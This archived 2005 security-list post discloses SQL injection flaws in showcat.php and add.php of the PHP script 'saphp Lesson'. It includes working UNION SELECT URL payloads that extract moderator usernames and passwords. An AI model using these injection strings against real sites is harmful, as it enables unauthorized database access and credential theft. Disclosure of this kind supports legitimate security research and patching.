Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  File Including In PBLang

  [SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

  [SA17353] gCards "limit" SQL Injection Vulnerability

  [Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

From:almaster_(at)_hotmail.com <almaster_(at)_hotmail.com>
Date:25.10.2005
Subject:SQL saphp Lesson

saphp Lesson ..
Search By Google :-
saphp Lesson

Gr33tz :-
aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com [email concealed]|-
Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -
Security4Arab .. A'Where Home ..

1- SQL Injection in showcat.php
http://www.site.com/dros/showcat.php?forumid=|almaster

2-SQL Injection in add.php
http://www.site.com/dros/add.php?forumid=|almaster

Exp:
- Get Username By This Injection :

dros/showcat.php?forumid=-
1%20UNION%20SELECT%20ModName%20FROM%20modretor

2- Get Password By This Injection :

dros/showcat.php?forumid=-
1%20UNION%20SELECT%20ModPassword%20FROM%20modretor

aLMaSTeR [at] hotmail [dot] com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru